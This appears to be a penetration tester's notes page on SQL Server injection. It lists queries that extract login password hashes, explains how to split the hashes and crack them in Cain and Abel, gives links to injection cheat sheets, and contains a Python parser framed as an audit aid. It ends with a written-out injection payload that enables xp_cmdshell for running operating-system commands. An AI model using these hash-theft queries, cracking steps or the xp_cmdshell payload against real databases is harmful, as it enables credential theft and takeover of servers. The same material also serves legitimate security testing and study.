SQL Server Injection: Commands Update

Stealing password hashes: know the table to use

SQL SERVER 2012 http://msdn.microsoft.com/en-us/library/ms187997.aspx and http://msdn.microsoft.com/en-us/library/ms179871.aspx

NO VERSION http://msdn.microsoft.com/en-us/library/ms179503.aspx
SQL SERVER 2000 "Select Password from SysxLogins Where Name = 'XXXX'" where XXXX is the login name

SQL SERVER 2000 "select name,password FROM master.dbo.sysxlogins"
SQL SERVER 2005 select password_hash FROM sys.sql_logins
(ref pg 194 of the book "SQL INJECTION attacks and defence")

SQL SERVER 2005: There is no sysxlogins table in SQL 2005. In SQL 2000 too it was undocumented. Either of the following catalog views can be used instead:

1. Sys.Server_Principals
2. Sys.sql_logins


http://www.subhashdasyam.com/2011/04/database-password-hashes-cracking.html
SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'Cain and Abel' and then work the case sensitive hash
SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack the case sensitive hash in Cain; try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use the function fn_varbintohexstr() to cast the password hash to a hex string,
e.g. (SQL Server 2005; on SQL Server 2000 the column is password in master.dbo.sysxlogins)
select name from sys.sql_logins union all select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins
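Added example (not from the blog post or the book cited above): a Python parser that splits a stored login hash into the header, salt and hash fields laid out in these notes and flags logins still held in the SQL Server 2000 layout, whose extra upper-case hash is what makes those logins the weaker ones to audit for. It reuses the two hashes quoted above as constructed sample rows; deciding the layout by length and the "weak legacy" label are assumptions drawn from these notes, not from Microsoft documentation.

```python
import binascii
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

HEADER = b"\x01\x00"   # the constant 0x0100 header shown in the notes above
SALT_LEN = 4           # 4-byte salt (8 hex characters)
DIGEST_LEN = 20        # each hash field is 20 bytes (40 hex characters)

@dataclass
class SqlLoginHash:
    version: str                 # "2000" or "2005", inferred from the layout length (assumption)
    salt: bytes
    case_sensitive: bytes
    upper_case: Optional[bytes]  # only the SQL Server 2000 layout carries this field

    @property
    def weak_legacy_format(self) -> bool:
        # The second, upper-cased hash removes case from the search space,
        # so logins still stored this way deserve an audit finding.
        return self.upper_case is not None

def parse_login_hash(text: str) -> SqlLoginHash:
    """Split a hash string (as returned by fn_varbintohexstr or the catalog views)."""
    hexstr = text.strip()
    if hexstr[:2].lower() == "0x":
        hexstr = hexstr[2:]
    raw = binascii.unhexlify(hexstr)
    if raw[:2] != HEADER:
        # Other header values are not covered by these notes; reject them.
        raise ValueError("unexpected header %s" % raw[:2].hex())
    salt, digests = raw[2:2 + SALT_LEN], raw[2 + SALT_LEN:]
    if len(digests) == DIGEST_LEN:            # 2005 layout: one hash
        return SqlLoginHash("2005", salt, digests, None)
    if len(digests) == 2 * DIGEST_LEN:        # 2000 layout: two hashes
        return SqlLoginHash("2000", salt, digests[:DIGEST_LEN], digests[DIGEST_LEN:])
    raise ValueError("unexpected length %d bytes" % len(raw))

def audit_logins(rows: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, bool]]:
    """Return (login, layout version, weak_legacy_format) for each (login, hash) row."""
    return [(name, p.version, p.weak_legacy_format)
            for name, p in ((name, parse_login_hash(h)) for name, h in rows)]

# Constructed sample rows using the two hashes quoted in the notes above.
SAMPLE_ROWS = [
    ("sa_2000", "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A"),
    ("sa_2005", "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"),
]

if __name__ == "__main__":
    print(audit_logins(SAMPLE_ROWS))
```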



List of data types for conversion/casting (CAST and CONVERT)
http://msdn.microsoft.com/en-us/library/ms187928.aspx

UPDATE statement syntax
http://msdn.microsoft.com/en-us/library/ms177523.aspx

INFORMATION_SCHEMA.COLUMNS
http://msdn.microsoft.com/en-us/library/ms188348.aspx
http://msdn.microsoft.com/en-US/library/ms174156(v=sql.90).aspx
http://www.simple-talk.com/sql/t-sql-programming/using-information-schema-views/

Cheatsheets
http://hacktivision.com/index.php/2009/06/17/sql-server-injection-cheat-sheet?blog=2
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://sudomakesandwich.com/2011/01/mysql-sql-server-injection-copy-pasta-cheat-sheet/
http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-joseph_mccray-adv_sql_injection.pdf


Cheatsheets less useful
http://www.michaelboman.org/books/sql-injection-cheat-sheet-informix
http://sqlservercode.blogspot.co.uk/2007/09/sql-injection-cheat-sheet.html
http://ha.ckers.org/sqlinjection/
http://www.sqlwebpedia.com/content/sql-server-cheat-sheets


Enabling xp_cmdshell

Input:
*Depends on the privileges of the SQL user

'; EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
Positive Response:

No error